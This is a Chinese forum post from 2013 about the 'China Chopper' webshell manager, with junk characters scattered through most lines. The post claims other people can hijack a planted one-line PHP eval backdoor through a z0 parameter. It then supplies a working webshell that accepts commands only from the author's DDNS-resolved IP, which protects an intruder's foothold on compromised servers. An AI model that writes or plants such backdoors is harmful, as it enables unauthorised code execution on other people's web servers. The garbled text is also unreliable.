今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞3 f+ `7 c$ O$ e. h
: k& E4 j9 X) M7 q9 g; T
就算你设置了密码,使用了eval($_REQUEST['moyo']);
\) H/ f2 N/ |. U4 }- a( f# c
5 D6 m# h: m( C& l! V但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
3 T& |3 I) d1 [. s" Q1 R. ]* f
; ?. l" p- f1 ~因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));# [5 ~: I: o' z8 Z
1 t& A1 x$ `0 A
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
8 E) }% G* B; G# w3 t$ R' p& f8 d& _' s1 [( D. h# F
不知道是设计缺陷还是故意留的后门
% O! H/ M' [' i- K, S, p* D3 F' z, q8 w% `# n' R5 K2 K
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
* E4 l- J) U7 H" O6 b, c5 C' q; m$ W# \. `3 ^
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org9 s+ c { Y( a) _. x D. Q, p
8 D: X! D! w5 z# I
然后一句话后门这样写
H, K& ?. Z" d3 z5 O1 k+ V7 z. G* [ I3 r" Y
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
% y5 n+ `! ]6 \7 n这样就可以让一句话后门只允许自己的电脑连接了
/ N5 _/ B" {" [; ^0 s) }. e$ l( l/ [" `; F
|
发表于 2013-7-26 12:45:48
收藏
支持
反对